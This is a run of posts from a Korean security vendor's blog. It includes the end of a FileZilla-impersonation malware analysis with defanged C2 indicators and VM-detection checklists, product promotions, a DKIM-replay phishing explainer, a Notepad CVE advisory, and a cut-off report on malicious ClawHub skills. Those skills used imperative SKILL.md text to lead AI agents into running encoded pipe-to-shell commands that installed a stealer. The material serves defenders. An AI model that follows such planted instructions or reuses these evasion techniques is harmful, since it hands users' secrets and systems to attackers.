이러한 방식은 텍스트 형태의 DNS 쿼리가 아닌 암호화된 HTTPS 트래픽으로 위장하여 DNS 모니터링을 회피하고, 보안 장비가 53번 포트(DNS 표준포트) 트래픽을 검사하거나 특정 도메인을 차단하더라도, DoH 요청은 신뢰할 수 있는 서비스(Cloudflare)로 향하는 정상적인 웹 트래픽으로 간주되어 DNS 기반 차단을 우회할 수 있습니다.

③ 유입 경로 식별 파라미터를 활용한 조직적 운영 체계

C2 통신 과정에서 사용되는 JSON 데이터를 분석한 결과 utm_tag, utm_source, referrer 등의 파라미터 조합이 확인되었습니다.

[그림 4] case1( 위)과 case2(아래) JSON 비교

Case1
{"tag":"tbs","referrer":"dll","callback":"hxxps://welcome.supp0v3[.]com/d/callback?utm_tag=tbs2&utm_source=dll"}
Case2
{"tag":"tbs","referrer":"FileZilla","callback":"hxxps://welcome.supp0v3[.]com/d/callback"}

이는 단순한 C2 통신이 아니라 공격자가 감염 경로와 피해자 그룹을 체계적으로 관리하고 있음을 시사하며, 이번 공격이 개인이 아닌 특정 공격 그룹의 의해 조직적으로 운영되고 있는 것으로 볼 수 있습니다.

④ 분석 환경 탐지

악성 DLL 파일에는 페이로드를 실행하기 전 분석 환경 여부를 체크하도록 설계된 여러 검사기능이 적용되어 있습니다.

시스템 BIOS 버전, 제조업체 정보(VMware, VirtualBox 등)를 조회하고, 프로세스 목록, 드라이버, 레지스트리 등 18종의 항목을 체크하여 가상 환경 인지를 확인합니다.

프로세스명	기능
vmtoolsd.exe	VMware Tools 데몬
vmwaretray.exe	VMware System Tray
vmwareuser.exe	VMware User Process
VGauthService.exe	VMware Guest Auth Service
vmacthlp.exe	VMware Activation Helper

[표 1] VMware 프로세스 체크리스트

드라이버명	기능
vmnet.sys	VMware 네트워크 드라이버
vmmouse.sys	VMware 가상 마우스 드라이버
vmusb.sys	VMware USB 드라이버
vm3dmp.sys	VMware SVGA II 3D 드라이버
vmci.sys	VMware VMCI 버스 드라이버
vmhgfs.sys	VMware Host-Guest 파일시스템
vmmemctl.sys	VMware 메모리 제어 드라이버
vmx86.sys	VMware 가상화 커널 드라이버
vmrawdsk.sys	VMware Raw Disk 드라이버
vmusbmouse.sys	VMware USB HID 마우스 드라이버
vmkdb.sys	VMware 커널 디버거 관련
vmnetuserif.sys	VMware 네트워크 유저 인터페이스 드라이버
vmnetadapter.sys	VMware 네트워크 어댑터 드라이버

[표 2] VMware 드라이버 체크리스트

RAT 주요 기능

최종 페이로드는 RAT(Remote Access Trojan) 악성코드로 확인되었으며, 공격자의 명령에 따라 다음과 같은 행위를 수행할 수 있습니다.

정보 탈취 (Credential Theft) - 웹 브라우저 및 시스템에 저장된 인증 정보 수집
키 입력 수집 (Keylogging) - 사용자의 키 입력을 기록하여 민감 정보 수집
화면 캡처 (Screenshot Capture) - 감염된 시스템의 화면을 캡처하여 전송
원격 제어 (HVNC) - 숨겨진 가상 데스크톱 세션을 생성하여 원격 제어를 수행하는 HVNC 기능을 통해 사용자 몰래 웹 브라우저 실행, 추가 악성코드 다운로드, 내부 시스템 접근 등 악성 행위 수행

공격 특징

이번 FileZilla 사칭 공격은 다음과 같은 보안 위협적 특징을 보입니다.

사회공학적 공격: 취약점 악용이 아닌 사용자가 직접 악성 파일을 내려받도록 유도하는 사회공학적 기법을 활용
고도화된 탐지 우회 기법 활용 : DLL 사이드로딩 및 다단계 로더, DoH 기술을 통해 엔드포인트/네트워크 탐지 차단
체계적인 타겟 관리: 식별 태그를 통한 유입 경로 추적 및 관리
분석방해 기법 적용: 다양한 시스템 지표를 대조하여 가상 머신 여부를 식별하고 분석 시도를 무력화

이번 사례는 취약점 악용이 아닌 가짜 웹사이트와 악성코드가 삽입된 정상 프로그램을 이용한 사회공학적 공격으로 가짜 웹사이트를 통한 악성코드 유포가 여전히 활발히 이루어지고 있음을 보여줍니다.

프로그램은 반드시 공식 사이트에서 다운로드하고, 출처가 불분명한 파일 실행을 자제하는 등 기본적인 보안 수칙을 준수하는 것이 무엇보다 중요합니다.

IoC

Indicator	Type	Description	Detection Name
C608AC44ED1F4FE707B9520F87FB1564	MD5	DLL 파일	Backdoor.Agent.361984A
9D7C559F1885EDE6911611165EFF07F7	MD5	DLL 파일	Backdoor.Agent.361984A
D7C3ECB76C03C1C0AA98D4E2D71C2BCF	MD5	FileZilla 설치파일	Trojan.Dropper.Agent
filezilla-project[.]live	DOMAIN	가짜 FileZilla사이트
hxxps://welcome.supp0v3[.]com/d/callback?utm_tag=tbs2&utm_source=dll	URL	C2
95.216.51[.]236:31415	IP	C2

중소기업 기술보호 바우처 지원사업 - 보안 솔루션 구축 비용 최대 80% 지원 받으세요!

알약5 — Mon, 9 Mar 2026 13:59:27 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

이스트시큐리티가 중소기업의 기술 보호 수준을 진단하고, 맞춤형 바우처를 통해 기업의 기술 보호 역량을 강화할 수 있도록 지원하는 ‘기술보호 바우처 지원사업’을 시작했습니다. 이스트시큐리티와 함께 최대 80% 비용 지원 혜택을 받아 보안솔루션을 구축할 수 있는 이번 기회를 놓치지 마세요!

▪️ 신청기간 : '26. 3. 9(월) ~ '26. 3. 30(월)

▪️ 지원 대상 : 「중소기업기본법 」제 2조 및 시행령 제 3조에 따른 중소기업
* 기존 사업 참여기업의 재신청 가능

▪️ 지원혜택 : 보안솔루션 도입비용 최대 80% 지원

▪️ 신청방법 : 기술보호울타리 홈페이지( https://www.ultari.go.kr )에서 신청

▪️ 관련 문의 : 이스트시큐리티 김새연 대리 (02-3470-2984)

기술 유출 예방과 맞춤형 보안 컨설팅 및 지원이 필요한 기업 고객들은 이스트시큐리티와 함께 바우처 신청을 위한 준비를 시작해 보시길 바랍니다!

문의처

이스트시큐리티 김새연 대리

02-3470-2984

saeyeon96@estsecurity.com

파일이 흩어지면 보안도 흩어진다! 구축형 프라이빗 클라우드 스토리지, '인터넷디스크'

알약5 — Tue, 3 Mar 2026 18:45:52 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

여러분의 조직에서 중요한 문서는 지금 어디에, 어떻게 저장되고 있나요? 직원 개인 PC에 흩어진 파일들, USB로 주고받는 자료, 메신저로 공유되는 기밀 문서들... 보안 담당자라면 한 번쯤 '우리 데이터가 과연 안전한가?'라는 불안함을 느껴보셨을 겁니다.

클라우드 전환과 원격·재택근무가 일상화된 오늘날, 업무 데이터의 분산과 유출 위험은 기업 보안의 핵심 과제가 되었습니다. 이제는 단순히 파일을 저장하는 것을 넘어, 보안이 내재된 협업 환경이 필요한 시대입니다. 오늘은 이스트시큐리티의 구축형 프라이빗 클라우드 스토리지 솔루션, '인터넷디스크(InternetDisk)' 를 소개합니다.

왜 지금 파일 관리 보안을 다시 점검해야할까?

개인 PC에 흩어진 업무 데이터의 위험

많은 조직에서 업무 문서는 여전히 직원 개인 PC에 분산 저장됩니다. 퇴직자가 발생하거나, 랜섬웨어 공격을 받으면 중요 데이터가 순식간에 사라지거나 외부로 유출될 수 있습니다. '그 파일 누가 갖고 있죠?'라는 질문이 반복되는 조직이라면, 지금이 바로 구조를 바꿀 때입니다.

업무 데이터는 개인 PC가 아닌, 조직이 통제하는 안전한 공간에 저장되어야 합니다.

내부 공유·협업 과정에서의 보안 사각지대

팀 단위의 협업을 위해 이메일 첨부, 메신저 전송, USB 복사 등 비공식 채널을 사용하다 보면 파일 버전 관리는 물론 접근 이력 추적조차 불가능해집니다. 외부 협력업체와 자료를 주고받는 과정도 마찬가지입니다.

공유와 협업 그 자체가 보안 취약점이 되지 않도록, 통제된 채널을 갖추는 것이 핵심입니다.

분산된 데이터에 대한 관리·감사의 어려움

누가, 언제, 어떤 파일에 접근했는지 추적할 수 있어야 내부 정보 유출 사고를 예방하고 사후 대응도 가능합니다. 하지만 파일이 흩어져 있다면 로그 수집 자체가 불가능합니다. 특히 금융, 공공, 제조 등 규제 업종은 이런 감사 요건이 더욱 엄격합니다.

파일에 대한 접근 및 작업 이력을 실시간으로 파악할 수 있는 통합 관리 환경이 필요합니다.

데이터의 분산과 유출을 막는 솔루션, 인터넷디스크

이스트시큐리티의 인터넷디스크(InternetDisk) 는 문서의 열람·저장·공유·협업·보안을 하나의 플랫폼에서 처리하는 구축형 프라이빗 클라우드 스토리지 솔루션입니다.

외부 퍼블릭 클라우드가 아닌 조직 내부에 직접 구축하는 방식이기 때문에, 데이터 주권을 완전히 유지하면서도 클라우드 수준의 편의성과 협업 환경을 제공합니다. 많은 금융·공공·대기업 고객이 이미 신뢰하고 도입한 검증된 솔루션입니다.

[이미지] 편리하고 안전한 업무환경을 지원하는 인터넷디스크

인터넷디스크 핵심 기능

1. 어디서든, 어떤 환경에서든 — 다양한 접속 환경 지원

웹 브라우저, 전용 탐색기, 윈도우 탐색기 등 익숙한 환경 그대로 사용 가능
모바일 전용 웹을 통해 스마트폰에서도 문서 열람 및 공유
한국어·영어·일어 UI 및 유니코드 지원으로 글로벌 업무 환경 대응

기존 업무 방식을 바꾸지 않아도 됩니다. 윈도우 탐색기처럼 쓰면서 보안 서버에 저장됩니다.

2. 안전하고 원활한 공유·협업

부서별, 프로젝트별로 별도 디스크 구성 가능
폴더 단위 공유 및 사용자·그룹별 세부 권한 설정
게스트 폴더, 웹 링크 기능으로 외부 협력업체와도 통제된 자료 공유 가능

공유방식	상세 내용
조직 내 폴더 공유	부서/프로젝트 단위로 접근 권한 부여
게스트 폴더	외부 협력사 계정 없이 지정 폴더 공유
웹 링크 공유	URL 기반으로 특정 파일·폴더 공유

3. 자동 백업 및 문서 유실 방지

관리자가 설정한 스케줄에 따라 사용자 PC를 자동으로 주기적 백업
정상적으로 삭제된 파일도 일정 기간 보관 → 관리자 복구 가능
버전 관리 기능으로 이전 버전 복원 지원

랜섬웨어로 파일이 암호화되어도, 인터넷디스크에 저장된 이전 버전으로 즉시 복구할 수 있습니다.

4. 전송 구간 및 저장 파일 암호화

파일 업로드·다운로드 전송 구간 암호화 적용
서버 저장 시에도 암호화 처리 → 해킹·도난 시에도 정보 유출 차단
주요 파일은 보안 폴더에 저장, 비인가 접근 원천 차단

5. 실시간 모니터링 및 로그 관리

파일 업로드, 다운로드, 삭제 등 모든 작업 이력 로그 기록
관리자 작업 내역까지 로깅 → 내부자 위협 대응 및 감사 대응 가능
조직 전체 데이터 흐름을 한눈에 파악

6. 사용자·권한 통합 관리

조직도 형태로 사용자 등록 및 관리
사용자·부서·그룹별 폴더 접근 및 작업 권한 세부 설정
별도 프로젝트 그룹 생성으로 유연한 협업 구조 지원

한눈에 보는 인터넷디스크 도입 효과

도입 전	도입 후
문서가 개인 PC에 분산 저장	서버 중앙 저장, 데이터 유실 방지
메신저·이메일로 비공식 공유	통제된 채널로 안전한 협업
접근 이력 추적 불가	실시간 로그 기록·감사 대응
랜섬웨어·PC 고장 시 복구 불가	자동 백업·버전 관리로 즉시 복구
외부 협력사와 보안 취약한 파일 공유	게스트 폴더·웹 링크로 안전하게 공유

고객 도입 사례

S사 (1,300 유저 도입)

사내 파일 서버 보안 개선 과정에서 사용자 파일 작업 이력 확인이 필요했습니다. 인터넷디스크 도입 후 윈도우 탐색기 환경 그대로 서버 저장 영역에서 작업할 수 있어 업무 효율성과 편의성이 동시에 향상되었습니다.

P사 (1,000 유저 도입)

연구소 내 작업물 공유·백업을 위해 웹하드 도입을 검토하던 중, 기존 솔루션과 충돌하지 않으면서 보안성을 갖춘 인터넷디스크를 선택했습니다. 저장·전송 암호화로 보안 요구사항을 충족하면서도 기존 업무 환경 그대로 협업이 가능한 점이 도입 결정의 핵심이었습니다.

이런 조직이라면, 인터넷디스크 도입을 검토해보세요!

☑︎ 직원 PC에 분산된 업무 문서를 중앙에서 통합 관리하고 싶은 조직

☑︎ 랜섬웨어·PC 고장으로 인한 데이터 유실이 걱정되는 조직

☑︎ 외부 협력업체와의 안전한 자료 공유 방법이 필요한 조직

☑︎ 금융·공공 등 규제 업종에서 파일 접근 로그와 감사 요건을 충족해야 하는 조직

☑︎ 퍼블릭 클라우드 대신 데이터 주권을 확보한 내부 구축형 스토리지를 원하는 조직

☑︎ 재택·원격 근무 환경에서도 보안을 유지하며 협업하고 싶은 조직

데이터는 기업의 핵심 자산입니다. 하지만 그 자산이 어디에 있는지조차 파악되지 않는다면, 보안은 시작조차 할 수 없습니다. 인터넷디스크는 데이터를 조직의 통제 안으로 되돌려 놓고, 그 위에서 안전한 협업이 이뤄질 수 있도록 합니다.

이스트시큐리티가 고객사의 업무 환경에 최적화된 데이터 보안 체계 구축을 도와드리겠습니다. 인터넷디스크 도입 관련하여 도움이 필요하시면, 아래 배너를 통해 컨설팅을 신청해주세요!

[이벤트] 이스트시큐리티, eGISEC 2026 참가! - 우리 기관 보안, 이제는 현장에서 직접 점검해보세요.

알약5 — Wed, 25 Feb 2026 13:42:44 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

이스트시큐리티가 오는 2026년 3월 18일(수)부터 20일(금)까지 KINTEX 제1전시장에서 개최되는 eGISEC 2026 전자정부 정보보호 솔루션 페어에 참가합니다.

이번 행사에서는 공공기관 및 기업 환경에 최적화된 엔드포인트 보안, 문서 보안, AI 보안까지 한 자리에서 직접 확인하실 수 있습니다. 단순 제품 소개를 넘어, 실제 운영 환경을 고려한 보안 체계 점검과 대응 전략을 제시해 드립니다.

eGISEC 2026 – KINTEX 제1전시장

2026.03.18(수) – 03.20(금)

최근 보안 위협은 단일 제품으로 대응하기 어려운 구조로 진화하고 있습니다. 랜섬웨어의 고도화, 내부자 유출 사고, 취약점 기반 침해 공격 등 복합적인 리스크가 동시에 발생하고 있기 때문입니다.

행사 기간 동안 이스트시큐리티 부스 (#P041) 에서는 엔드포인트 보안, 문서 보안, 그리고 기업 AI 보안(LLM) 솔루션을 직접 시연하며, 실제 운영 환경을 고려한 보안 체계를 현장에서 확인하실 수 있습니다. 변화하는 위협 환경에 대응하기 위한 실질적인 보안 전략과 적용 방안을 구체적으로 안내해드립니다.

또한 참여형 타임 이벤트와 함께 기업·기관별 보안 환경을 점검하는 맞춤형 컨설팅도 제공합니다. 현장에서 도입 방향과 단계별 적용 전략까지 상세히 안내해드릴 예정이니, 이스트시큐리티 부스를 방문하시어 귀사의 보안 체계를 직접 점검해 보시기 바랍니다.

사전 예약 이벤트

보안 담당자라면, 이번 기회에 단순 정보 수집이 아닌 실질적인 보안 체계 점검과 개선 방향까지 확인해보세요!

✔ 대기 없이 즉시 상담 가능

✔ 기관 맞춤형 보안 점검 자료 사전 준비

✔ 도입 검토 시 PoC 및 기술 지원 우선 제공

✔ 현장 상담 고객 한정 프로모션 혜택 증정

현장 상담 고객 한정 프로모션

eGISEC 2026 현장에서 상담 후 신규 도입 시, 추가 도입 인센티브를 별도 제공해드립니다.

보안은 빠르게 결정할수록 유리합니다. 현장에서 직접 확인하고 가장 좋은 조건으로 도입하세요.

✔ 신규 도입 시, 도입 금액 200만원당 Alan Works 계정 1개 제공 (1년 사용)

✔ 구매 금액별 프리미엄 경품 증정

이런 기관이라면 꼭 방문하세요!

▪︎ 내부 자료 유출 리스크를 관리해야 하는 공공기관

▪︎ 랜섬웨어 대응 체계를 재정비 중인 기업

▪︎ VPN 기반 원격 접속 보안에 한계를 느끼는 조직

▪︎ 취약점 관리 및 패치 관리 자동화가 필요한 환경

▪︎ 생성형 AI 도입은 필요하지만 보안이 우려되는 기업

▪︎ 보안 재정비가 필요하지만 예산이 고민인 기업

▪︎ 타사 백신 사용 중 계약 만료가 다가오는 기업

지금 바로 현장 상담을 사전 예약하시고, 실제 도입 관점에서의 보안 체계를 점검해보시기 바랍니다. 보안은 정보가 아니라, 실행 전략입니다. 이번 eGISEC 이스트시큐리티 부스에서 그 해답을 확인해보세요!

이스트시큐리티 디지털 쇼룸 바로가기

“애플·페이팔 메일도 믿을 수 없다” DKIM 리플레이 공격으로 진화한 송장 피싱 주의

알약5 — Tue, 24 Feb 2026 14:45:25 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

최근 애플과 페이팔 같은 글로벌 결제 플랫폼의 결제 요청서(Invoice)·분쟁 알림 기능을 악용한 신종 피싱 공격이 전 세계적으로 확산되고 있습니다. 이 공격은 정상 플랫폼에서 실제로 발송된 이메일을 그대로 재활용하는 방식으로, 기존 이메일 인증 체계(SPF·DKIM·DMARC)를 교묘히 우회한다는 점에서 각별한 주의가 필요합니다.

해외 보안 매체 Cyber Security News 등 다수의 보안 리포트에 따르면, 공격자는 먼저 애플이나 페이팔에 가짜 판매자 계정을 생성한 뒤, 해당 플랫폼의 ‘결제 요청’ 또는 ‘거래 취소 요청’ 기능을 이용해 자신에게 인보이스 메일을 발송합니다. 이후 이렇게 받은 정상 메일을 그대로 다수의 피해자에게 재전송(리플레이)함으로써, 사용자가 플랫폼에서 온 공식 결제 안내로 믿도록 유도합니다.

정상 플랫폼 기능을 악용한 송장 피싱 수법

이 공격의 핵심은 플랫폼이 제공하는 공식 기능과 실제 메일 템플릿을 그대로 악용한다는 점입니다.

[이미지] App Store invoice abused by DKIM replay attack (출처: Kaseya)

공격 과정은 다음과 같이 요약할 수 있습니다.

▪︎ 공격자가 애플·페이팔 등의 계정 및 판매자 프로필을 생성

▪︎ 결제 요청서(Invoice)나 분쟁 알림을 자신의 이메일 주소로 발송

▪︎ 그 메일을 별도 변경 없이 여러 피해자에게 다시 전달(포워딩/리플레이)

이때 공격자는 결제 요청서의 메모란, 설명란, 판매자명 등에 사기성 문구와 전화번호 등을 삽입합니다. 겉으로 보기에는 애플·페이팔에서 발송된 정상 결제 알림처럼 보이기 때문에, 사용자는 이를 실제 결제 오류나 무단 결제로 오인하고 이메일에 적힌 번호로 전화를 걸거나, 안내된 절차를 따르게 됩니다.

전화 연결 이후에는 상담원을 사칭한 공격자가 “결제 취소를 도와주겠다”, “계정 보호를 위해 본인 확인이 필요하다”는 명목으로 카드 번호, CVC, 일회용 인증번호, 계정 자격 증명 등을 요구하며 민감한 금융·계정 정보를 탈취합니다.

왜 더 위험할까? : DKIM 리플레이 공격의 구조적 맹점

[이미지] PayPal disputed invoice abused by DKIM replay attacks (출처: Kaseya)

이번 공격이 특히 위험한 이유는 DKIM 리플레이(DKIM Replay Attack) 기법을 활용한다는 점입니다.

▪︎ DKIM(DomainKeys Identified Mail)은 발신 도메인이 위조되지 않았는지 확인하기 위해, 메일 본문과 일부 헤더에 대해 전자서명을 적용하는 이메일 인증 기술입니다.

▪︎ 애플·페이팔에서 원래 보낸 인보이스 메일은 이 DKIM 서명이 포함되어 있으며, 수신 서버에서는 이 서명이 유효한지 검증해 dkim=pass 판정을 내립니다.

문제는 공격자가 자신에게 정상적으로 도착한 메일을 내용 변경 없이 그대로 재전송할 경우, 원본에 포함된 DKIM 서명이 그대로 유지된다는 점입니다. 메일 본문과 서명 대상 헤더가 변조되지 않기 때문에, 수신 서버 입장에서는 이 메일을 여전히 '해당 도메인(apple.com, paypal.com)에서 보낸 정상 메일'로 인식하게 됩니다.

이 과정에서 SPF는 공격자의 발송 IP가 공식 발송 서버가 아니기 때문에 실패할 수 있지만, DMARC 정책이 'DKIM 또는 SPF 중 하나가 일치하면 통과'하도록 설정된 경우, 유효한 DKIM 서명만으로도 DMARC까지 통과하게 됩니다. 즉, 인증 프로토콜은 '누가 보냈는지(From 도메인)'는 확인하지만, '해당 내용이 안전한지, 악성 의도가 있는지'까지는 보장하지 못하는 구조적 한계를 노린 것입니다.

이메일 인증만으로는 충분하지 않은 이유

이번 사례는 이메일 보안이 단순히 SPF·DKIM·DMARC를 구성했다고 해서 자동으로 완결되는 체계가 아니라는 점을 분명히 보여줍니다.

▪︎ 인증은 어디까지나 발신 도메인의 정당성을 검증하는 수단입니다.

▪︎ 공격자는 이 정당한 발신 채널을 먼저 확보한 뒤, 그 안에 사회공학(Social Engineering) 요소와 금융 사기를 끼워 넣어 악용하고 있습니다.

특히 기업 환경에서는 재무·구매·영업 조직이 실제 결제 요청, 인보이스, 구독 갱신·취소 알림을 빈번하게 수신합니다. 이 때문에 정상 업무 흐름과 매우 유사한 형태로 위장한 송장 피싱에 취약할 수밖에 없습니다.

단 한 번의 전화 통화나 링크 클릭만으로도 계정 탈취와 카드 정보 유출이 발생할 수 있고, 그 여파가 개인을 넘어 회사 계정, SaaS 구독, 결제 채널까지 확산될 수 있다는 점에서 조직 전체 리스크로 이어질 수 있습니다.

조직 차원의 대응 전략과 점검 포인트

보안팀·IT 운영팀은 단순히 인증 결과만 보지 말고, 아래와 같은 관점에서 추가적인 방어·모니터링 체계를 마련할 필요가 있습니다.

1) 이메일 인증 결과 해석 고도화

▪︎ dkim=pass, dmarc=pass라는 이유만으로 메일을 자동 '정상'으로 분류하지 않도록 정책을 설계해야 합니다.

▪︎발신 도메인이 애플·페이팔 등으로 표시되더라도, 발송 IP가 해당 업체의 공식 SPF 범위에 포함되는지, 과거 정상 트래픽 패턴과 일치하는지는 별도로 검증하는 것이 바람직합니다.

2) 수신자 정보 정합성 검증 강화

▪︎ 메일 게이트웨이에서 Envelope To(실제 수신자)와 메일 헤더의 To, 내부 디렉터리의 실제 사용자 정보가 일치하는지 검사하는 정책을 강화합니다.

▪︎ 벤더 인보이스 메일인데 조직 내 다수 사용자에게 동시·반복적으로 전달되는 패턴, 혹은 명백히 관계 없는 부서/계정으로 발송되는 경우를 이상 징후로 인식해 추가 점검 대상으로 분류할 수 있습니다.

3) 금융 행위와 연결된 메일에 대한 별도 처리

▪︎ 결제 요청서, 송장, 구독 갱신·취소, 분쟁 해결 안내 등 금융·결제와 직결되는 메일에 대해서는 별도의 경고 배너나 사용자 주의 문구를 자동으로 삽입하는 방안을 고려합니다.

▪︎ 문구 예시

“결제 취소·환불을 요청하는 메일입니다. 메일의 전화번호·링크 대신 공식 웹사이트 또는 앱을 직접 열어 확인하세요.”와 같은 명시적 경고를 표시합니다.

4) DKIM 리플레이 패턴 탐지

▪︎ 동일한 DKIM 서명을 가진 인보이스/알림 메일이 단기간에 여러 수신자에게 반복적으로 들어오는지 모니터링하는 규칙을 마련합니다.

▪︎ 애플·페이팔 등에서 온 것으로 보이지만, 발송 IP가 공식 공개 정보와 크게 동떨어져 있거나, 특정 외부 호스팅/프록시에서 반복적으로 포착되는 경우 우선 격리 후 검토하는 것도 한 방법입니다.

임직원·개인 사용자 행동 수칙

기술적 방어와 더불어, 사용자 인식 제고와 보안 교육이 무엇보다 중요합니다. 다음 원칙을 반드시 안내·교육하는 것을 권장합니다.

1) '정상 도메인 = 안전'이라는 생각 버리기

▪︎ service@paypal.com, no-reply@apple.com 처럼 보여도, 그 메일이 항상 안전하다고 가정해서는 안 됩니다.

▪︎ 브랜드 로고, 공식 템플릿, 도메인이 모두 진짜일 수 있지만, 그 안에 포함된 전화번호·문의 경로·설명 문구가 공격자가 삽입한 것일 수 있다는 점을 강조해야 합니다.

2) 전화번호·링크는 사용하지 말고, 직접 접속해 확인하기

▪︎ 결제 취소, 구독 해지, 무단 결제 알림, 계정 잠금 해제 안내 등 민감한 알림 메일을 받았을 때는, 메일에 적힌 전화번호나 링크를 절대 그대로 사용하지 말고, 브라우저나 공식 앱에서 주소를 직접 입력해 접속해야 합니다.

▪︎ PayPal의 경우 직접 paypal.com에 접속해 로그인 후 활동 내역(Activity)·Resolution Center에서 동일 알림이 존재하는지 확인하고, 존재하지 않는다면 피싱으로 의심해야 합니다.

▪︎ 애플 역시 appleid.apple.com 또는 공식 앱스토어/구독 관리 화면을 통해 결제 내역과 구독 상태를 확인하는 습관을 들여야 합니다.

3) 추가 정보 요구 시 즉시 의심하기

▪︎ 전화 상담 중 카드 전체 번호, CVC, 일회용 인증번호, 계정 비밀번호, 보안 질문 답변 등을 요구한다면, 즉시 통화를 종료하고 공식 채널로 다시 확인해야 합니다.

▪︎ 실제 애플·페이팔·은행 등은 전화나 이메일을 통해 비밀번호나 전체 카드 번호를 요구하지 않는다는 점을 반복적으로 교육해야 합니다.

애플·페이팔 인보이스 기능을 악용한 DKIM 리플레이 기반 송장 피싱은, 전통적인 ‘도메인 위조 메일’과는 다른 차원의 위협입니다. 발신 도메인과 템플릿, DKIM·DMARC까지 모두 정상처럼 보이기 때문에, 이제는 '메일이 진짜냐 가짜냐'를 넘어서 '내용·행동 요청이 합리적인가, 검증 가능한 공식 경로를 통해 재확인했는가'를 기준으로 판단해야 합니다.

조직과 개인 모두, 이메일 인증 기술을 절대적인 안전 장치로 과신하기보다, 기술·정책·사용자 인식이 결합된 다층적인 방어 전략을 통해 이런 유형의 공격에 대비해야 합니다.

[참고 출처]

Hackers Exploit Legitimate Apple and PayPal Invoice Emails in DKIM Replay Attacks – Cyber Security News

Windows 메모장 원격 코드 실행(RCE) 취약점 업데이트 권고(CVE-2026-20841)

알약4 — Fri, 13 Feb 2026 10:48:43 +0900

Windows용 '메모장(Notepad)' 앱에서 원격 코드 실행(RCE) 취약점이 발견되었습니다.

이번 취약점은 최신 메모장 앱에 추가된 '마크다운(Markdown) 렌더링' 기능의 허점을 악용한 것입니다.

공격자가 특수하게 조작한 링크가 담긴 마크다운(.md) 파일을 메모장으로 열고 클릭할 경우, 윈도우의 별도 보안 시스템 경고 없이 공격자의 원격 서버에 있는 악성 파일이 즉시 실행될 수 있습니다.

현재 공격을 증명하는 코드(PoC)가 공개되어 있어 실제 피해로 이어질 가능성이 높으므로 사용자분들의 신속한 업데이트가 필요합니다.

CVE 번호

CVE-2026-20841

영향 받는 버전

Microsoft Store 배포 메모장 앱 v11.0.0 이상 ~ v11.2510 미만

Windows 11: 기본 메모장이 Store버전으로 대부분 해당
Windows 10: 기본 메모장이 레거시 버전(notepad.exe)으로 Microsoft Store에서 메모장 앱을 별도로 설치한 경우에만 해당

※ 시스템 기본 폴더에 위치한 구버전 '레거시 메모장(Notepad.exe)'은 마크다운 기능이 없어 이번 취약점에 해당되지 않습니다.

패치 방법

메모장 앱 v11.2510 이상으로 업데이트

[Microsoft Store] 앱 실행 > 좌측 하단 [다운로드] > [업데이트 확인]클릭, 메모장앱 최신버전으로 업데이트

참고:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841

https://nvd.nist.gov/vuln/detail/CVE-2026-20841

https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&bbsId=B0000133&searchWrd=&menuNo=205020&pageIndex=1&categoryCode=&nttId=71968

AI 에이전트 확장 마켓플레이스 ClawHub, 대규모 공급망 공격 발생

알약4 — Thu, 12 Feb 2026 18:04:02 +0900

세계적으로 많은 관심을 받고 있는 AI 에이전트 OpenClaw의 공식 플러그인 마켓플레이스인 ClawHub에서 공급망 공격이 발생했습니다. 해당 공격을 보고한 보안 업체의 조사 결과에 따르면 전체 2,857개의 스킬 중 약 341개 이상이 악성으로 확인되었습니다.

이번 사건은 AI 에이전트의 생태계가 폭발적으로 확산됨에 따라 공격 대상이 될 수 있음을 보여준 사례입니다.

OpenClaw와 ClawHub 란?

OpenClaw는 사용자의 로컬 환경에서 구동되는 AI 에이전트로, 캘린더 관리, 통신 플랫폼 명령 등 다양한 자동화 작업을 수행합니다. 기능 확장은 사용자 또는 외부 개발자가 만든 '스킬(Skill)'이라는 플러그인 형태로 제공되며, ClawHub는 이러한 스킬을 배포하고 설치할 수 있는 허브(레지스트리)입니다.

공격 방식 요약

1. 스킬 업로드 체계의 허점

ClawHub는 스킬 업로드 과정에서 충분한 코드 리뷰를 진행하지 않았으며, 업로더에 대한 인증도 미흡했습니다.

이로 인해 악성 스킬이 공식 저장소에 손쉽게 등록될 수 있었습니다.

[그림 1 ] 공격자 계정에 업로드 된 악성 스킬

2. 에이전트 조작 공학(Agent Engineering)

기존의 사회공학(Social Engineering)이 사람의 심리를 이용해 행동을 유도하는 기법이라면, 이번 공격은 AI 에이전트의 지시 해석 구조를 이용해 명령 실행을 유도하는 기법으로, 이를 '에이전트 조작 공학(Agent Engineering)'이라 부를 수 있습니다.

공격자는 SKILL.md 파일의 경고 이모지와 함께 "Prerequisites" 섹션에 "IMPORTANT", "required" 등 강한 어조의 지침을 삽입하여, AI 에이전트가 이를 필수 설치 절차로 해석하고 사용자에게 외부 명령 실행을 안내하거나 직접 실행하도록 유도했습니다.

[그림 2] 악성 SKILL.md 파일 화면

3. 확장 설치 절차를 이용한 간접 명령 실행 - 다단계 페이로드 전달(Multi-stage Delivery)

실제 악성 코드 실행은 기존 악성코드 유포와 동일한 탐지 회피 구조를 따릅니다.

SKILL.md의 안내에 따라 외부 사이트에 접속하면, 인코딩된 명령이 디코딩되어 내부 명령어로 스크립트를 다운로드하고, 파이프라인(|sh)을 통해 추가 페이로드를 실행합니다.

ClawHub에 업로드된 스킬 파일 자체에는 악성 코드가 포함되지 않아, 기존 분석만으로는 탐지가 어려운 구조입니다.

[그림 3] SKILL.md파일에 안내된 악성 사이트 및 악성 명령어

공격 피해 범위

최종적으로 다운로드 된 페이로드는 정보 탈취형 악성코드인 Amos로 확인되었으며, 이로 인해 에이전트가 설치된 디바이스에서 발생할 수 있는 위협은 다음과 같습니다.

정보 탈취: 문서, 암호, API 키 등 민감 정보 유출
원격 명령 실행: 공격자의 명령으로 추가 악성 코드 설치 가능
암호화폐 자산 노출: 암호화폐 관련 도구로 위장한 스킬을 통해 지갑 정보 접근 시도
측면 이동 가능성

대응 현황

이스트시큐리티는 새로운 보안 위협이 확장 됨에 따라 해당 공급망을 감시하고 있으며, 모니터링 이후 동일 공격자의 소행으로 보이는 정보 탈취 악성코드 배포 공격을 빠르게 감지, 신고 및 자사 제품에 반영하여 사용자는 물론 커뮤니티와 생태계에 기여하고 있습니다.

현재 이러한 공격을 인지한 ClawHub에서는 다음과 같은 조치를 취하고 있습니다.

스킬 검증 강화 :
